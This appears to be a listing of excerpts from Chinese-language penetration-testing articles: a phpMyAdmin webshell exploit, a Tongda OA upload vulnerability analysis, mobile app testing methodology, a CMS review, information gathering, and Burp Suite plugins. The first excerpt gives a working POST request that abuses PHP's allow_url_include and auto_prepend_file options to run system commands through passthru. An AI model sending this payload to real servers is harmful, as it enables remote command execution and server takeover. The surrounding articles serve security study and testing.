写入WebShell 利用php配置漏洞，执行php代码进而执行系统命令 （可利用Burpsuite发送POST） POST http://192.168.2.101/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.2.101 Content-Length: 34 <?php passthru('id'); die(); ?> 将执行命令替换为 passthru('ls /var/www'); 1 查看www网站下的...

一、漏洞简介 通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。3月13日，通达OA在官方论坛发布通告称，近日接到用户反馈遭到勒索病毒攻击，攻击者通过构造恶意请求，上传webshell等恶意文件，并对入侵的服务器进行文件加密，勒索高额匿名货币赎金。笔者长期从事二进制漏洞的研究，写此文旨在学习web漏洞的研究方法并以此漏洞为实践，强化对web漏洞利用技术的认识，记录之。 二、漏洞分析 资料显示，该漏洞影响范围较广，影响的版本有：V11版、2017版、2016版...

一、前言 移动互联网应用程序（Mobile APP，以下简称“APP”或“移动APP”）安全早已成为信息安全领域中广受关注的热点话题。作为安全检测人员，在日常测试工作中经常涉及移动APP的安全检测，在此结合相关移动APP检测标准和工作经验，从渗透测试角度，对移动APP的检测进行概要性总结说明。 二、目标分析 移动APP的安全问题与传统桌面软件有所不同。虽然现代移动操作系统（如Android和iOS）已比较注重安全防护，但如果APP开发人员在开发移动应用程序时不全面仔细地考虑安全性，APP仍可能会存在可被利用的安全漏洞，从而面临安全威胁。移动APP渗透测试目的就是充分分析和...

系统介绍 CMS名称：新秀企业网站系统PHP版 官网：www.sinsiu.com 版本：这里国光用的1.0 正式版 （官网最新的版本有毒，网站安装的时候居然默认使用远程数据库？？？迷之操作 那站长的后台密码岂不是直接泄露了？疑似远程数据库地址：server.sinsiu.net ） 下载地址：蓝奏云 Windows下使用PHPStudy可以直接安装，搭建起来还是很简单的。 防护策略 虽然这是一个不知名的小系统，但是安全加固还是考虑到的，很多本应该有漏洞的地方均被加固修复了...

信息收集概念、作用和分类 在一次护网行动中再次深刻意识到了信息收集对于渗透测试整个流程的重要性，信息收集的完整性决定了你的渗透测试结果，“知己知彼，百战不殆”。在此，为了使今后的渗透测试工作更加流程化、规范化，提高工作效率为前提，我总结了常见的信息收集经验和技巧，希望对大家有一定帮助。 信息收集概念 信息收集是指黑客为了更加有效地实施渗透攻击而在攻击前或攻击过程中对目标的所有探测活动。 信息收集作用 1.了解组织安全架构 2.缩小攻击范围 3.描绘网络拓扑 4.建立脆弱点数据库 信息收集分类 ...

使用Burp对安卓应用进行渗透测试的过程中，有时候会遇到某些流量无法拦截的情况，这些流量可能不是HTTP协议的，或者是“比较特殊”的HTTP协议(以下统称非HTTP流量)。遇到这种情况，大多数人会选择切换到Wireshark等抓包工具来分析。下面要介绍的，是给测试人员另一个选择——通过Burpsuite插件NoPE Proxy对非HTTP流量抓包分析，并可实现数据包截断修改、重放等功能。 ## NoPE Proxy简介 NoPE Proxy插件为Burpsuite扩展了两个新的特性： 1. 一个可配置的DNS服务器 这个DNS服务器将所有的域名解析到Burp所...

众所周知，Burp Suite是响当当的web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析，到寻找和利用安全漏洞等过程，所有工具为支持整体测试程序而无缝地在一起工作。 平台中所有工具共享同一robust框架，以便统一处理HTTP请求、持久性、认证、上游代理、日志记录、报警和可扩展性。Burp Suite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。 拦截代理（Proxy），你可以检查和更改浏览器与目标应用程序间的流量； 可感知应用程序的网络爬虫（Spider），它能完整的枚举应用程序的内容和功能； 高级扫描器，执行后它能自动地发现web应用程序...